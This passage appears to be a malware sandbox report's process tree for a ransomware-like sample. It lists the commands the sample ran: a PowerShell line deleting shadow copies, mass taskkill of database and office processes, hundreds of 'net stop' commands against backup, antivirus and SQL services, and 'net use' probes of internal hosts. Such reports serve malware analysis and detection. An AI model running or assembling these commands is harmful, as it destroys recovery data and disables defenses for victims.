  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  PID:11568
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  PID:11484
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:13868
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.10.0.21
  2⤵
  PID:12708
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  PID:9900
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  PID:9440
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  PID:9432
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  PID:9420
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  PID:9404
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  PID:9396
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  PID:9388
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  PID:9380
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:9372
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  PID:9364
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  PID:9356
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:9348
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  PID:9340
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  PID:9332
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  PID:9324
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  PID:9316
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  PID:9300
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  PID:9292
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  PID:9284
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  PID:9276
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  PID:9264
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:9252
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  PID:9244
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  PID:9236
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  PID:9228
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  PID:8212
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  PID:4600
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  PID:6576
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  PID:5108
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:7220
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  PID:4456
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  PID:4168
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  PID:4784
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  PID:3756
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:4588
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:5612
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  PID:8164
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  PID:7300
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  PID:7348
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:7372
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  PID:7412
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  PID:7452
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:7484
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  PID:5012
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  PID:5076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:10436
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:7784
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ntrtscan /y
  2⤵
  PID:5044
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:8544
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:8424
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:8408
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:8400
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:8392
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:8384
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop DCAgent /y
  2⤵
  PID:7904
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:7896
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:7884
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AVP /y
  2⤵
  PID:7868
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:7860
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /
  2⤵
  PID:7852
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:7840
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Antivirus /y
  2⤵
  PID:7832
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:7816
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:7804
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:7796
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$PROD /y
  2⤵
  PID:7788
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:7772
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Web Control Service” /y
  2⤵
  PID:7764
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:7756
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:7744
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos System Protection Service” /y
  2⤵
  PID:7736
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:7720
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:7712
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Safestore Service” /y
  2⤵
  PID:7704
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop audioendpointbuilder /y
  2⤵
  PID:7692
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:7684
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:7676
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Message Router” /y
  2⤵
  PID:7668
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop unistoresvc_1af40a /y
  2⤵
  PID:7660
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:7652
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ARSM /y
  2⤵
  PID:6892
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos MCS Client” /y
  2⤵
  PID:6884
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop msexchangeimap4 /y
  2⤵
  PID:6876
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “intel(r) proset monitoring service” /y
  2⤵
  PID:6868
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:6860
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:6852
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos MCS Agent” /y
  2⤵
  PID:6840
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop msexchangeadtopology /y
  2⤵
  PID:6832
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “aphidmonitorservice” /y
  2⤵
  PID:6816
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:6808
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Zoolz 2 Service” /y
  2⤵
  PID:6800
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:6792
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Health Service” /y
  2⤵
  PID:6776
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeSRS /y
  2⤵
  PID:6768
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop W3Svc /y
  2⤵
  PID:6760
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:6752
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Veeam Backup Catalog Data Service” /y
  2⤵
  PID:6736
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer$TPS /y
  2⤵
  PID:6728
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos File Scanner Service” /y
  2⤵
  PID:6720
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop UI0Detect /y
  2⤵
  PID:6696
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:6688
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Symantec System Recovery” /y
  2⤵
  PID:6680
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:6664
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Device Control Service” /y
  2⤵
  PID:6656
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeMTA /y
  2⤵
  PID:6648
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SstpSvc /y
  2⤵
  PID:6632
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop msftesql$PROD /y
  2⤵
  PID:6620
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “SQLsafe Filter Service” /y
  2⤵
  PID:6612
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:6604
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SMTPSvc /y
  2⤵
  PID:6596
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Clean Service” /y
  2⤵
  PID:6588
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:6580
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop POP3Svc /y
  2⤵
  PID:6564
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MsDtsServer110 /y
  2⤵
  PID:6556
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “SQLsafe Backup Service” /y
  2⤵
  PID:6548
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer /y
  2⤵
  PID:6540
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SamSs /y
  2⤵
  PID:6532
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos AutoUpdate Service” /y
  2⤵
  PID:6524
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeIS /y
  2⤵
  PID:6508
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop NetMsmqActivator /y
  2⤵
  PID:6492
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MsDtsServer100 /y
  2⤵
  PID:6484
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “SQL Backups /y
  2⤵
  PID:6476
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Enterprise Client Service” /y
  2⤵
  PID:6464
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop EraserSvc11710 /y
  2⤵
  PID:6452
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Agent” /y
  2⤵
  PID:6444
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeES /y
  2⤵
  PID:6436
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop IISAdmin /y
  2⤵
  PID:6420
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MsDtsServer /y
  2⤵
  PID:6412
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Acronis VSS Provider” /y
  2⤵
  PID:6404
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:6396
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:6380
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:6372
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:6364
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:6356
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:6340
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:6332
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:6324
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:6308
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:6300
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop vapiendpoint /y
  2⤵
  PID:6292
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mssql$vim_sqlexp /y
  2⤵
  PID:6284
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop WRSVC /y
  2⤵
  PID:6268
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:6260
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:6252
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:6244
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:6228
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:6220
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop TrueKey /y
  2⤵
  PID:6204
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:6188
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop tmlisten /y
  2⤵
  PID:6176
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLBrowser /y
  2⤵
  PID:6168
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop TmCCSF /y
  2⤵
  PID:6160
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:5264
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop swi_update_64 /y
  2⤵
  PID:5036
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:4376
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop swi_update /y
  2⤵
  PID:6140
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:6132
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop swi_service /y
  2⤵
  PID:6124
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:6116
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop swi_filter /y
  2⤵
  PID:6100
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:6092
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop svcGenericHost /y
  2⤵
  PID:6084
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:6076
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:6068
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.10.0.11
  2⤵
  PID:14452
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.10.0.14
  2⤵
  PID:14896
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.10.0.30
  2⤵
  PID:11152
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.10.0.33
  2⤵
  PID:10188
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.10.0.36
  2⤵
  PID:11756
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.10.0.38
  2⤵
  PID:13012
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:6060
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sophossps /y
  2⤵
  PID:6044
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:6036
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SntpService /y
  2⤵
  PID:6028
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:6016
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SmcService /y
  2⤵
  PID:6008
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:5992
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Smcinst /y
  2⤵
  PID:5984
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:5976
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ShMonitor /y
  2⤵
  PID:5960
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:5952
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SepMasterService /y
  2⤵
  PID:5944
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:5928
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SAVService /y
  2⤵
  PID:5920
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:5912
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SAVAdminService /y
  2⤵
  PID:5896
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:5888
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sacsvr /y
  2⤵
  PID:5880
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:5872
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:5856
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:5848
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sms_site_sql_backup /y
  2⤵
  PID:5840
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mfevtp /y
  2⤵
  PID:5820
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop RESvc /y
  2⤵
  PID:5812
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:5804
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mfemms /y
  2⤵
  PID:5788
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:5780
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:5772
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mfefire /y
  2⤵
  PID:5764
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop OracleClientCache80 /y
  2⤵
  PID:5748
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5740
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McTaskManager /y
  2⤵
  PID:5732
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MySQL80 /y
  2⤵
  PID:5716
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:5708
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McShield /y
  2⤵
  PID:5700
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MySQL57 /y
  2⤵
  PID:5684
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5676
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:5668
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:5656
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamMountSvc /y
  2⤵
  PID:5640
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeFramework /y
  2⤵
  PID:5632
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:5624
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:5616
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeEngineService /y
  2⤵
  PID:5600
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:5592
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:5576
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MBEndpointAgent /y
  2⤵
  PID:5568
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLSERVER /y
  2⤵
  PID:5560
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MBAMService /y
  2⤵
  PID:5544
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:5536
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5528
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop masvc /y
  2⤵
  PID:5516
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:5500
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:5492
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop macmnsvc /y
  2⤵
  PID:5484
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:5476
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:5464
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop klnagent /y
  2⤵
  PID:5456
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:5448
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:5440
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop kavfsslp /y
  2⤵
  PID:5432
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:5420
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:5412
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop KAVFSGT /y
  2⤵
  PID:5404
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:5396
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLWriter /y
  2⤵
  PID:5388
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop KAVFS /y
  2⤵
  PID:5376
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:5368
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:5360
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop FA_Scheduler /y
  2⤵
  PID:5352
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:5344
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SDRSVC /y
  2⤵
  PID:5332
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ESHASRV /y
  2⤵
  PID:5324
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:5316
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:5308
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop EsgShKernel /y
  2⤵
  PID:5300
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:5288
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mozyprobackup /y
  2⤵
  PID:5280
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ekrn /y
  2⤵
  PID:5272
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start upnphost /y
1⤵
PID:4940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
1⤵
PID:5052

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
1⤵
PID:4460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
1⤵
PID:4300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
1⤵
PID:10036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:11460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
1⤵
PID:12000

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:12484

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
1⤵
PID:13080

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
1⤵
PID:13056

